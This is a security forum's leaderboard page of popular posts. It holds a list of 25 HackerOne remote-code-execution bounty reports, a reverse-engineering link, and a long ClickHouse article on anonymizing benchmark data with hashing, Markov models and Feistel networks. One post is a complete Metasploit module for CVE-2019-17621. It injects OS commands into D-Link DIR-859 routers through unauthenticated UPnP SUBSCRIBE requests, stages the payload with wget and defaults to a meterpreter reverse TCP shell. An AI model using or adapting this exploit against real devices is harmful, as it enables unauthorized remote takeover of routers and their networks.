Leaderboard

Popular Content

Showing content with the highest reputation on 01/26/20 in all areas

  1. Top 25 RCE Bug Bounty Reports

The reports were disclosed through the HackerOne platform and were selected according to their upvotes, bounty, severity level, complexity, and uniqueness.

#1 Title: Potential pre-auth RCE on Twitter VPN
   Company: Twitter
   Bounty: $20,160
   Link: https://hackerone.com/reports/591295
#2 Title: RCE on Steam Client via buffer overflow in Server Info
   Company: Valve
   Bounty: $18,000
   Link: https://hackerone.com/reports/470520
#3 Title: Struct type confusion RCE
   Company: Shopify
   Bounty: $18,000
   Link: https://hackerone.com/reports/181879
#4 Title: Malformed .BSP Access Violation in CS:GO can lead to Remote Code Execution
   Company: Valve
   Bounty: $12,500
   Link: https://hackerone.com/reports/351014
#5 Title: Git flag injection - local file overwrite to remote code execution
   Company: GitLab
   Bounty: $12,000
   Link: https://hackerone.com/reports/658013
#6 Title: Remote Code Execution on www.semrush.com/my_reports on Logo upload
   Company: SEMrush
   Bounty: $10,000
   Link: https://hackerone.com/reports/403417
#7 Title: Panorama UI XSS leads to Remote Code Execution via Kick/Disconnect Message
   Company: Valve
   Bounty: $9,000
   Link: https://hackerone.com/reports/631956
#8 Title: RCE using bash command injection on /system/images (toimitilat.lahitapiola.fi)
   Company: LocalTapiola
   Bounty: $6,800
   Link: https://hackerone.com/reports/303061
#9 Title: Remote Code Execution at http://tw.corp.ubnt.com
   Company: Ubiquiti Inc.
   Bounty: $5,000
   Link: https://hackerone.com/reports/269066
#10 Title: Adobe Flash Player Regular Expression UAF Remote Code Execution Vulnerability
   Company: Flash (IBB)
   Bounty: $5,000
   Link: https://hackerone.com/reports/139879
#11 Title: RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`
   Company: Imgur
   Bounty: $5,000
   Link: https://hackerone.com/reports/212696
#12 Title: RCE and Complete Server Takeover of http://www.█████.starbucks.com.sg/
   Company: Starbucks
   Bounty: $4,000
   Link: https://hackerone.com/reports/502758
#13 Title: [ RCE ] Through stopping the redirect in /admin/* the attacker able to bypass Authentication And Upload Malicious File
   Company: Mail.ru
   Bounty: $4,000
   Link: https://hackerone.com/reports/683957
#14 Title: Blind SQLi leading to RCE, from Unauthenticated access to a test API Webservice
   Company: Starbucks
   Bounty: $4,000
   Link: https://hackerone.com/reports/592400
#15 Title: Attention! Remote Code Execution at http://wpt.ec2.shopify.com/
   Company: Shopify
   Bounty: $3,000
   Link: https://hackerone.com/reports/73567
#16 Title: Unchecked weapon id in WeaponList message parser on client leads to RCE
   Company: Valve
   Bounty: $3,000
   Link: https://hackerone.com/reports/513154
#17 Title: Drupal 7 pre auth sql injection and remote code execution
   Company: The Internet Bug Bounty Program
   Bounty: $3,000
   Link: https://hackerone.com/reports/31756
#18 Title: RCE via ssh:// URIs in multiple VCS
   Company: The Internet Bug Bounty Program
   Bounty: $3,000
   Link: https://hackerone.com/reports/260005
#19 Title: Remote Code Execution on Git.imgur-dev.com
   Company: Imgur
   Bounty: $2,500
   Link: https://hackerone.com/reports/206227
#20 Title: GMP Deserialization Type Confusion Vulnerability [MyBB <= 1.8.3 RCE Vulnerability]
   Company: PHP (IBB)
   Bounty: $1,500
   Link: https://hackerone.com/reports/198734
#21 Title: Old WebKit HTML agent in Template Preview function has multiple known vulnerabilities leading to RCE
   Company: Lob
   Bounty: $1,500
   Link: https://hackerone.com/reports/520717
#22 Title: Remote code execution using render :inline
   Company: Ruby on Rails
   Bounty: $1,500
   Link: https://hackerone.com/reports/113928
#23 Title: RCE which may occur due to `ActiveSupport::MessageVerifier` or `ActiveSupport::MessageEncryptor` (especially Active storage)
   Company: Ruby on Rails
   Bounty: $1,500
   Link: https://hackerone.com/reports/473888
#24 Title: Remote code execution on rubygems.org
   Company: RubyGems
   Bounty: $1,500
   Link: https://hackerone.com/reports/274990
#25 Title: WordPress SOME bug in plupload.flash.swf leading to RCE
   Company: Automattic
   Bounty: $1,337
   Link: https://hackerone.com/reports/134738

Bonus: 10 Zero Dollars RCE Reports

#1 Bonus Title: Read files on application server, leads to RCE
   Company: GitLab
   Bounty: $0
   Link: https://hackerone.com/reports/178152
#2 Bonus Title: XXE in DoD website that may lead to RCE
   Company: U.S. D.o.D.
   Bounty: $0
   Link: https://hackerone.com/reports/227880
#3 Bonus Title: Remote Code Execution (RCE) in a DoD website
   Company: U.S. D.o.D.
   Bounty: $0
   Link: https://hackerone.com/reports/248116
#4 Bonus Title: Remote Unrestricted file Creation/Deletion and Possible RCE.
   Company: Twitter
   Bounty: $0
   Link: https://hackerone.com/reports/191884
#5 Bonus Title: RCE on via CVE-2017-10271
   Company: U.S. D.o.D.
   Bounty: $0
   Link: https://hackerone.com/reports/576887
#6 Bonus Title: Ability to access all user authentication tokens, leads to RCE
   Company: GitLab
   Bounty: $0
   Link: https://hackerone.com/reports/158330
#7 Bonus Title: Remote Code Execution via Extract App Plugin
   Company: Nextcloud
   Bounty: $0
   Link: https://hackerone.com/reports/546753
#8 Bonus Title: Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
   Company: U.S. D.o.D.
   Bounty: $0
   Link: https://hackerone.com/reports/678496
#9 Bonus Title: Remote Code Execution in Rocket.Chat Desktop
   Company: Rocket.chat
   Bounty: $0
   Link: https://hackerone.com/reports/276031
#10 Bonus Title: [npm-git-publish] RCE via insecure command formatting
   Company: Node.js third-party modules
   Bounty: $0
   Link: https://hackerone.com/reports/730121
    2 points
  2. https://github.com/wtsxDev/reverse-engineering
    1 point
  3. Your link had already been posted twice.
    1 point
  4. https://rstforums.com/forum/search/?q=https://rstforums.com/forum/search/?q=https://github.com/wtsxDev/reverse-engineering
    1 point
  5. D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
      'Description' => %q{
        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
        /htdocs/cgibin), which is accessible without credentials.
      },
      'Author' => [
        'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
        'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2019-17621' ],
        [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
      ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged' => true,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
        'CMDSTAGER::FLAVOR' => 'wget',
        'RPORT' => '49152'
      },
      'Targets' => [
        [ 'Automatic', { } ],
      ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget' => 0,
    ))
  end

  def execute_command(cmd, opts)
    callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +
      ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +
      "/" + Rex::Text.rand_text_alpha(3..12)
    begin
      send_request_raw({
        'uri' => "/gena.cgi?service=`#{cmd}`",
        'method' => 'SUBSCRIBE',
        'headers' => {
          'Callback' => "<#{callback_uri}>",
          'NT' => 'upnp:event',
          'Timeout' => 'Second-1800',
        },
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def exploit
    execute_cmdstager(linemax: 500)
  end
end

# 0day.today [2020-01-24]
# Source: 0day.today
    1 point
  6. ClickHouse users already know that its biggest advantage is its high-speed processing of analytical queries. But claims like this need to be confirmed with reliable performance testing. That's what we want to talk about today.

We started running tests in 2013, long before the product was available as open source. Back then, just like now, our main concern was data processing speed in Yandex.Metrica. We had been storing that data in ClickHouse since January of 2009. Part of the data had been written to a database starting in 2012, and part was converted from OLAPServer and Metrage (data structures previously used by Yandex.Metrica). For testing, we took the first subset at random from data for 1 billion pageviews. Yandex.Metrica didn't have any queries at that point, so we came up with queries that interested us, using all the possible ways to filter, aggregate, and sort the data.

ClickHouse performance was compared with similar systems like Vertica and MonetDB. To avoid bias, testing was performed by an employee who hadn't participated in ClickHouse development, and special cases in the code were not optimized until all the results were obtained. We used the same approach to get a data set for functional testing.

After ClickHouse was released as open source in 2016, people began questioning these tests.

Shortcomings of tests on private data

Our performance tests:

- Can't be reproduced independently because they use private data that can't be published. Some of the functional tests are not available to external users for the same reason.
- Need further development. The set of tests needs to be substantially expanded in order to isolate performance changes in individual parts of the system.
- Don't run on a per-commit basis or for individual pull requests. External developers can't check their code for performance regressions.
We could solve these problems by throwing out the old tests and writing new ones based on open data, like flight data for the USA and taxi rides in New York. Or we could use benchmarks like TPC-H, TPC-DS, and Star Schema Benchmark. The disadvantage is that this data is very different from Yandex.Metrica data, and we would rather keep the test queries.

Why it's important to use real data

Performance should only be tested on real data from a production environment. Let's look at some examples.

Example 1

Let's say you fill a database with evenly distributed pseudorandom numbers. Data compression isn't going to work in this case, although data compression is essential to analytical databases. There is no silver bullet solution to the challenge of choosing the right compression algorithm and the right way to integrate it into the system, since data compression requires a compromise between the speed of compression and decompression and the potential compression efficiency. But systems that can't compress data are guaranteed losers. If your tests use evenly distributed pseudorandom numbers, this factor is ignored, and the results will be distorted.

Bottom line: Test data must have a realistic compression ratio.

I covered optimization of ClickHouse data compression algorithms in a previous post.

Example 2

Let's say we are interested in the execution speed of this SQL query:

    SELECT RegionID, uniq(UserID) AS visitors
    FROM test.hits
    GROUP BY RegionID
    ORDER BY visitors DESC
    LIMIT 10

This is a typical query for Yandex.Metrica. What affects the processing speed?

- How GROUP BY is executed.
- Which data structure is used for calculating the uniq aggregate function.
- How many different RegionIDs there are and how much RAM each state of the uniq function requires.

But another important factor is that the amount of data is distributed unevenly between regions. (It probably follows a power law. I put the distribution on a log-log graph, but I can't say for sure.)
If this is the case, it is important that the states of the uniq aggregate function with fewer values use very little memory. When there are a lot of different aggregation keys, every single byte counts. How can we get generated data that has all these properties? The obvious solution is to use real data.

Many DBMSs implement the HyperLogLog data structure for an approximation of COUNT(DISTINCT), but none of them work very well because this data structure uses a fixed amount of memory. ClickHouse has a function that uses a combination of three different data structures, depending on the size of the data set.

Bottom line: Test data must represent distribution properties of the real data well enough, meaning cardinality (number of distinct values per column) and cross-column cardinality (number of different values counted across several different columns).

Example 3

Instead of testing the performance of the ClickHouse DBMS, let's take something simpler, like hash tables. For hash tables, it's essential to choose the right hash function. This is not as important for std::unordered_map, because it's a hash table based on chaining and a prime number is used as the array size. The standard library implementation in GCC and Clang uses a trivial hash function as the default hash function for numeric types. However, std::unordered_map is not the best choice when we are looking for maximum speed. With an open-addressing hash table, we can't just use a standard hash function. Choosing the right hash function becomes the deciding factor.

It's easy to find hash table performance tests using random data that don't take the hash functions used into account. There are also plenty of hash function tests that focus on the calculation speed and certain quality criteria, even though they ignore the data structures used. But the fact is that hash tables and HyperLogLog require different hash function quality criteria.
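To make the point about open addressing concrete, here is a minimal Python sketch (not ClickHouse code). It assumes a linear-probing table whose size is a power of two, a hypothetical `count_probes` helper, and a multiplicative (Fibonacci) hash as a stand-in for a better hash function. All of these are illustrative choices rather than anything the article specifies.

```python
MASK64 = (1 << 64) - 1
GOLDEN = 0x9E3779B97F4A7C15  # 2**64 divided by the golden ratio (Fibonacci hashing)


def identity_hash(key: int, table_bits: int) -> int:
    # Trivial hash: just the low bits of the key.
    return key & ((1 << table_bits) - 1)


def fibonacci_hash(key: int, table_bits: int) -> int:
    # Multiply, then keep the top bits of the 64-bit product.
    return ((key * GOLDEN) & MASK64) >> (64 - table_bits)


def count_probes(keys, table_bits, hash_fn) -> int:
    """Insert keys with linear probing and count the extra probes needed."""
    size = 1 << table_bits
    table = [None] * size
    extra = 0
    for key in keys:
        slot = hash_fn(key, table_bits)
        while table[slot] is not None:
            slot = (slot + 1) & (size - 1)
            extra += 1
        table[slot] = key
    return extra


# Keys that are all multiples of 1024 share the same low 10 bits.
keys = [i * 1024 for i in range(512)]
bad = count_probes(keys, 10, identity_hash)
good = count_probes(keys, 10, fibonacci_hash)
print(bad, good)
```

With the trivial hash, every key lands in slot 0 and each insertion walks the whole cluster. A benchmark on uniformly random keys would never show this, which is the kind of distortion the example describes.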
You can learn more about this in "How hash tables work in ClickHouse" (presentation in Russian). The information is slightly outdated, since it doesn't cover Swiss Tables.

Challenge

Our goal is to obtain data for testing performance that has the same structure as Yandex.Metrica data with all the properties that are important for benchmarks, but in such a way that there remain no traces of real website users in this data. In other words, the data must be anonymized and still preserve:

- Compression ratio.
- Cardinality (the number of distinct values).
- Mutual cardinality between several different columns.
- Properties of probability distributions that can be used for data modeling (for example, if we believe that regions are distributed according to a power law, then the exponent, which is the distribution parameter, should be approximately the same for artificial data and for real data).

How can we get a similar compression ratio for the data? If LZ4 is used, substrings in binary data must be repeated at approximately the same distance and the repetitions must be approximately the same length. For ZSTD, entropy per byte must also coincide.

The ultimate goal is to create a publicly available tool that anyone can use to anonymize their data sets for publication. This would allow us to debug and test performance on other people's data similar to our production data. We would also like the generated data to be interesting.

However, these are very loosely-defined requirements and we aren't planning to write up a formal problem statement or specification for this task.

Possible solutions

I don't want to make it sound like this problem is particularly important. It was never actually included in planning and no one had intentions to work on it. I just kept hoping that an idea would come up some day, and suddenly I would be in a good mood and be able to put everything else off until later.
Explicit probabilistic models

The first idea is to take each column in the table and find a family of probability distributions that models it, then adjust parameters based on the data statistics (model fitting) and use the resulting distribution to generate new data. A pseudorandom number generator with a predefined seed could be used to get a reproducible result.

Markov chains could be used for text fields. This is a familiar model that could be implemented effectively.

However, it would require a few tricks:

- We want to preserve the continuity of time series. This means that for some types of data, we need to model the difference between neighboring values, rather than the value itself.
- To model "joint cardinality" of columns we will also have to explicitly reflect dependencies between columns. For instance, there are usually very few IP addresses per user ID, so to generate an IP address we would use a hash value of the user ID as a seed and also add a small amount of other pseudorandom data.
- We aren't sure how to express the dependency that the same user frequently visits URLs with matching domains at approximately the same time.

All this can be written in a C++ "script" with the distributions and dependencies hard coded. However, Markov models are obtained from a combination of statistics with smoothing and adding noise. I started writing a script like this, but after writing explicit models for ten columns, it became unbearably boring, and the "hits" table in Yandex.Metrica had more than 100 columns way back in 2012.
    EventTime.day(std::discrete_distribution<>({
        0, 0, 13, 30, 0, 14, 42, 5, 6, 31, 17, 0, 0, 0, 0, 23, 10, ...})(random));
    EventTime.hour(std::discrete_distribution<>({
        13, 7, 4, 3, 2, 3, 4, 6, 10, 16, 20, 23, 24, 23, 18, 19, 19, ...})(random));
    EventTime.minute(std::uniform_int_distribution<UInt8>(0, 59)(random));
    EventTime.second(std::uniform_int_distribution<UInt8>(0, 59)(random));

    UInt64 UserID = hash(4, powerLaw(5000, 1.1));
    UserID = UserID / 10000000000ULL * 10000000000ULL
        + static_cast<time_t>(EventTime) + UserID % 1000000;

    random_with_seed.seed(powerLaw(5000, 1.1));
    auto get_random_with_seed = [&]{ return random_with_seed(); };

This approach was a failure. If I had tried harder, maybe the script would be ready by now.

Advantages:

- Conceptual simplicity.

Disadvantages:

- Large amount of work required.
- The solution only applies to one type of data.

And I would prefer a more general solution that can be used for Yandex.Metrica data as well as for obfuscating any other data.

In any case, this solution could be improved. Instead of manually selecting models, we could implement a catalog of models and choose the best among them (best fit plus some form of regularization). Or maybe we could use Markov models for all types of fields, not just for text. Dependencies between data could also be extracted automatically. This would require calculating the relative entropy (relative amount of information) between columns. A simpler alternative is to calculate relative cardinalities for each pair of columns (something like "how many different values of A are there on average for a fixed value B"). For instance, this will make it clear that URLDomain fully depends on the URL, and not vice versa.

But I rejected this idea as well, because there are too many factors to consider and it would take too long to write.

Neural networks

As I've already mentioned, this task wasn't high on the priority list: no one was even thinking about trying to solve it.
But as luck would have it, our colleague Ivan Puzirevsky was teaching at the Higher School of Economics. He asked me if I had any interesting problems that would work as suitable thesis topics for his students. When I offered him this one, he assured me it had potential. So I handed this challenge off to a nice guy "off the street" Sharif (he did have to sign an NDA to access the data, though).

I shared all my ideas with him but emphasized that there were no restrictions on how the problem could be solved, and a good option would be to try approaches that I know nothing about, like using LSTM to generate a text dump of data. This seemed promising after I came across the article The Unreasonable Effectiveness of Recurrent Neural Networks.

The first challenge is that we need to generate structured data, not just text. But it wasn't clear whether a recurrent neural network could generate data with the desired structure. There are two ways to solve this. The first solution is to use separate models for generating the structure and the "filler" and only use the neural network for generating values. But this approach was postponed and then never completed. The second solution is to simply generate a TSV dump as text. Experience has shown that some of the rows in the text won't match the structure, but these rows can be thrown out when loading the data.

The second challenge is that the recurrent neural network generates a sequence of data, and thus dependencies in data must follow in the order of the sequence. But in our data, the order of columns can potentially be in reverse to dependencies between them. We didn't do anything to resolve this problem.

As summer approached, we had the first working Python script that generated data. The data quality seemed decent at first glance.

However, we did run into some difficulties:

The size of the model is about a gigabyte. We tried to create a model for data that was several gigabytes in size (for a start).
The fact that the resulting model is so large raises concerns. Would it be possible to extract the real data that it was trained on? Unlikely. But I don't know much about machine learning and neural networks, and I haven't read this developer's Python code, so how can I be sure? There were several articles published at the time about how to compress neural networks without loss of quality, but this wasn't implemented. On the one hand, this doesn't seem to be a serious problem, since we can opt out of publishing the model and just publish the generated data. On the other hand, if overfitting occurs, the generated data may contain some part of the source data.

On a machine with a single CPU, the data generation speed is approximately 100 rows per second. Our goal was to generate at least a billion rows. Calculations showed that this wouldn't be completed before the date of the thesis defense. It didn't make sense to use additional hardware, because the goal was to make a data generation tool that could be used by anyone.

Sharif tried to analyze the quality of data by comparing statistics. Among other things, he calculated the frequency of different characters occurring in the source data and in the generated data. The result was stunning: the most frequent characters were Ð and Ñ.

Don't worry about Sharif, though. He successfully defended his thesis and then we happily forgot about the whole thing.

Mutation of compressed data

Let's assume that the problem statement has been reduced to a single point: we need to generate data that has the same compression ratio as the source data, and the data must decompress at the same speed. How can we achieve this? We need to edit compressed data bytes directly! This allows us to change the data without changing the size of the compressed data, plus everything will work fast. I wanted to try out this idea right away, despite the fact that the problem it solves is not the same one we started with. But that's how it always is.
So how do we edit a compressed file? Let's say we are only interested in LZ4. LZ4 compressed data is composed of sequences, which in turn are strings of uncompressed bytes (literals), followed by a match copy:

- Literals (copy the following N bytes as is).
- Matches with a minimum repeat length of 4 (repeat N bytes that were in the file at a distance of M).

Source data: Hello world Hello.

Compressed data (arbitrary example): literals 12 "Hello world " match 5 12.

In the compressed file, we leave "match" as-is, and change the byte values in "literals". As a result, after decompressing, we get a file in which all repeating sequences at least 4 bytes long are also repeated at the same distance, but they consist of a different set of bytes (basically, the modified file doesn't contain a single byte that was taken from the source file).

But how do we change the bytes? The answer isn't obvious, because in addition to the column types, the data also has its own internal, implicit structure that we would like to preserve. For example, text is often stored in UTF-8 encoding, and we want the generated data to also be valid UTF-8. I developed a simple heuristic that involves meeting several criteria:

- Null bytes and ASCII control characters are kept as-is.
- Some punctuation characters remain as-is.
- ASCII is converted to ASCII and for everything else the most significant bit is preserved (or an explicit set of "if" statements is written for different UTF-8 lengths). In one byte class a new value is picked uniformly at random.
- Fragments like https:// are preserved, otherwise it looks a bit silly.

The only caveat to this approach is that the data model is the source data itself, which means it cannot be published. The model is only fit for generating amounts of data no larger than the source. In contrast, the previous approaches provide models which allow generating data of arbitrary size.
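The idea can be sketched in a few lines of Python. This is a toy model, not the real LZ4 block format: the token list, the `decode` and `mutate` helpers, and the exact byte classes (digits, uppercase, lowercase, everything else in ASCII left alone) are assumptions made for illustration. Non-ASCII bytes keep only their most significant bit, which is the simplest variant mentioned above and does not guarantee valid UTF-8.

```python
import random

# Byte classes within which a replacement is drawn uniformly (an assumption).
CLASSES = [(0x30, 0x39), (0x41, 0x5A), (0x61, 0x7A)]  # digits, A-Z, a-z


def mutate_byte(b: int, rng: random.Random) -> int:
    for lo, hi in CLASSES:
        if lo <= b <= hi:
            return rng.randint(lo, hi)
    if b >= 0x80:
        return rng.randint(0x80, 0xFF)  # keep only the most significant bit
    return b  # NUL, control characters, space and punctuation stay as-is


def mutate(tokens, seed: int):
    """Rewrite literal bytes; leave match tokens untouched."""
    rng = random.Random(seed)
    return [
        ("literals", bytes(mutate_byte(b, rng) for b in tok[1]))
        if tok[0] == "literals" else tok
        for tok in tokens
    ]


def decode(tokens) -> bytes:
    """Toy decompressor: literals are copied, matches repeat earlier output."""
    out = bytearray()
    for tok in tokens:
        if tok[0] == "literals":
            out += tok[1]
        else:
            _, length, distance = tok
            for _ in range(length):
                out.append(out[-distance])
    return bytes(out)


# The example from the text: "Hello world Hello".
tokens = [("literals", b"Hello world "), ("match", 5, 12)]
original = decode(tokens)
mutated = decode(mutate(tokens, seed=1))
print(original, mutated)
```

The mutated output has the same length as the original, and its last five bytes still repeat its first five, because the match token was left untouched.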
Example for a URL:

    http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXeAyAx
    http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac
    http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXe
    http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac
    http://ljc.she/kdoqdqwdbknvj.s/hmqhpsavon.yf#aortxqdvjja
    http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja
    http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht
    http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja
    http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht
    http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja
    http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu-702130

The results were positive and the data was interesting, but something wasn't quite right. The URLs kept the same structure, but in some of them it was too easy to recognize "yandex" or "avito" (a popular marketplace in Russia), so I created a heuristic that swaps some of the bytes around.

There were other concerns as well. For example, sensitive information could possibly reside in a FixedString column in binary representation and potentially consist of ASCII control characters and punctuation, which I decided to preserve. However, I didn't take data types into consideration.

Another problem is that if a column stores data in the "length, value" format (this is how String columns are stored), how do I ensure that the length remains correct after the mutation? When I tried to fix this, I immediately lost interest.

Random permutations

Unfortunately, the problem wasn't solved. We performed a few experiments, and it just got worse. The only thing left was to sit around doing nothing and surf the web randomly, since the magic was gone. Luckily, I came across a page that explained the algorithm for rendering the death of the main character in the game Wolfenstein 3D.

The animation is really well done: the screen fills up with blood. The article explains that this is actually a pseudorandom permutation.
A random permutation of a set of elements is a randomly picked bijective (one-to-one) transformation of the set, or a mapping where each and every derived element corresponds to exactly one original element (and vice versa). In other words, it is a way to randomly iterate through all the elements of a data set. And that is exactly the process shown in the picture: each pixel is filled in random order, without any repetition. If we were to just choose a random pixel at each step, it would take a long time to get to the last one.

The game uses a very simple algorithm for pseudorandom permutation called linear feedback shift register (LFSR). Similar to pseudorandom number generators, random permutations, or rather their families, can be cryptographically strong when parametrized by a key. This is exactly what we need for data transformation. However, the details might be trickier. For example, cryptographically strong encryption of N bytes to N bytes with a pre-determined key and initialization vector seems like it would work for a pseudorandom permutation of a set of N-byte strings. Indeed, this is a one-to-one transformation and it appears to be random. But if we use the same transformation for all of our data, the result may be susceptible to cryptanalysis because the same initialization vector and key value are used multiple times. This is similar to the Electronic Codebook mode of operation for a block cipher.

What are the possible ways to get a pseudorandom permutation? We can take simple one-to-one transformations and build a complex function that looks random. Here are some of my favorite one-to-one transformations:

- Multiplication by an odd number (like a large prime number) in two's complement arithmetic.
- Xorshift: x ^= x >> N.
- CRC-N, where N is the number of bits in the argument.

For example, two multiplications and three xorshift operations are used for the murmurhash finalizer. This operation is a pseudorandom permutation.
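A short Python sketch can show why these building blocks are one-to-one. It uses the 64-bit MurmurHash3 finalizer (`fmix64`, which consists of two multiplications and three xorshifts) and builds its inverse from the inverses of each step. The helper names are made up for this sketch, and the modular inverse via `pow(c, -1, m)` needs Python 3.8 or later.

```python
MASK64 = (1 << 64) - 1
C1 = 0xFF51AFD7ED558CCD  # MurmurHash3 fmix64 constants
C2 = 0xC4CEB9FE1A85EC53


def multiply_odd(x: int, m: int, bits: int = 64) -> int:
    # Multiplication by an odd constant modulo 2**bits is invertible.
    return (x * m) & ((1 << bits) - 1)


def xorshift(x: int, n: int) -> int:
    return x ^ (x >> n)


def unxorshift(x: int, n: int, bits: int = 64) -> int:
    # Each iteration recovers n more bits, starting from the top.
    y = x
    for _ in range(bits // n + 1):
        y = x ^ (y >> n)
    return y


def fmix64(k: int) -> int:
    k = xorshift(k, 33)
    k = multiply_odd(k, C1)
    k = xorshift(k, 33)
    k = multiply_odd(k, C2)
    return xorshift(k, 33)


def fmix64_inverse(k: int) -> int:
    # Undo the steps in reverse order, using modular inverses of C1 and C2.
    k = unxorshift(k, 33)
    k = multiply_odd(k, pow(C2, -1, 1 << 64))
    k = unxorshift(k, 33)
    k = multiply_odd(k, pow(C1, -1, 1 << 64))
    return unxorshift(k, 33)


x = 0x0123456789ABCDEF
print(hex(fmix64(x)), fmix64_inverse(fmix64(x)) == x)
```

Because every step can be undone, the composition is a permutation of the 64-bit integers. That says nothing about cryptographic strength; it only shows that no two inputs collide.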
However, I should point out that hash functions don't have to be one-to-one (even hashes of N bits to N bits).

Or here's another interesting example from elementary number theory from Jeff Preshing's website.

How can we use pseudorandom permutations to solve our problem? We can use them to transform all numeric fields so we can preserve the cardinalities and mutual cardinalities of all combinations of fields. In other words, COUNT(DISTINCT) will return the same value as before the transformation, and furthermore, with any GROUP BY.

It is worth noting that preserving all cardinalities somewhat contradicts our goal of data anonymization. Let's say someone knows that the source data for site sessions contains a user who visited sites from 10 different countries, and they want to find that user in the transformed data. The transformed data also shows that the user visited sites from 10 different countries, which makes it easy to narrow down the search. Even if they find out what the user was transformed into, it won't be very useful, because all the other data has also been transformed, so they won't be able to figure out what sites the user visited or anything else. But these rules can be applied in a chain. For example, if someone knows that the most frequently occurring website in our data is Yandex, with Google in second place, they can just use ranking to determine which transformed site identifiers actually mean Yandex and Google. There's nothing surprising about this, since we are working with an informal problem statement and we are just trying to find a balance between anonymization of data (hiding information) and preserving data properties (disclosure of information). For information about how to approach the data anonymization issue more reliably, read this article.

In addition to keeping the original cardinality of values, I also want to keep the order of magnitude of the values.
What I mean is that if the source data contained numbers under 10, then I want the transformed numbers to also be small. How can we achieve this?

For example, we can divide a set of possible values into size classes and perform permutations within each class separately (maintaining the size classes). The easiest way to do this is to take the nearest power of two or the position of the most significant bit in the number as the size class (these are the same thing). The numbers 0 and 1 will always remain as is. The numbers 2 and 3 will sometimes remain as is (with a probability of 1/2) and will sometimes be swapped (with a probability of 1/2). The set of numbers 1024..2047 will be mapped to one of 1024! (factorial) variants, and so on. For signed numbers, we will keep the sign.

It's also doubtful whether we need a one-to-one function. We can probably just use a cryptographically strong hash function. The transformation won't be one-to-one, but the cardinality will be close to the same.

However, we do need a cryptographically strong random permutation so that when we define a key and derive a permutation with that key, it would be difficult to restore the original data from the rearranged data without knowing the key.

There is one problem: in addition to knowing nothing about neural networks and machine learning, I am also quite ignorant when it comes to cryptography. That leaves just my courage. I was still reading random web pages, and found a link on Hacker News to a discussion on Fabien Sanglard's page. It had a link to a blog post by Redis developer Salvatore Sanfilippo that talked about using a wonderful generic way of getting random permutations, known as a Feistel network.

The Feistel network is iterative, consisting of rounds. Each round is a remarkable transformation that allows you to get a one-to-one function from any function. Let's look at how it works.
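In code, one round maps a (left, right) pair to (right, left XOR F(right)), and that is invertible no matter what F is. The Python sketch below is a minimal illustration under stated assumptions: the function names are hypothetical, and a truncated SHA-256 of the key, round number and half is used as the round function F simply because it is convenient, not because the article prescribes it.

```python
import hashlib


def round_function(half: int, key: bytes, round_no: int, bits: int) -> int:
    # F: any function of the half, the key and the round number (assumed SHA-256).
    data = key + bytes([round_no]) + half.to_bytes(8, "little")
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest[:8], "little") & ((1 << bits) - 1)


def feistel_permute(value: int, key: bytes, half_bits: int = 8, rounds: int = 4) -> int:
    """Permute a (2 * half_bits)-bit value with a balanced Feistel network."""
    mask = (1 << half_bits) - 1
    left, right = value >> half_bits, value & mask
    for r in range(rounds):
        # The right half moves left; the new right half is left ^ F(right).
        left, right = right, left ^ round_function(right, key, r, half_bits)
    return (left << half_bits) | right


def feistel_invert(value: int, key: bytes, half_bits: int = 8, rounds: int = 4) -> int:
    """Undo feistel_permute by running the rounds backwards."""
    mask = (1 << half_bits) - 1
    left, right = value >> half_bits, value & mask
    for r in reversed(range(rounds)):
        left, right = right ^ round_function(left, key, r, half_bits), left
    return (left << half_bits) | right


key = b"example key"
y = feistel_permute(12345, key)
print(y, feistel_invert(y, key))
```

Applied to every 16-bit value with the same key, `feistel_permute` produces each 16-bit value exactly once, so distinct inputs always stay distinct. Note that F itself is never inverted; `feistel_invert` only recomputes it.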
1. The argument's bits are divided into two halves:

    arg:   xxxxyyyy
    arg_l: xxxx
    arg_r: yyyy

2. The right half replaces the left. In its place we put the result of XOR on the initial value of the left half and the result of the function applied to the initial value of the right half, like this:

    res:   yyyyzzzz
    res_l = yyyy = arg_r
    res_r = zzzz = arg_l ^ F(arg_r)

There is also a claim that if we use a cryptographically strong pseudorandom function for F and apply a Feistel round at least 4 times, we'll get a cryptographically strong pseudorandom permutation. This is like a miracle: we take a function that produces random garbage based on data, insert it into the Feistel network, and we now have a function that produces random garbage based on data, but yet is invertible!

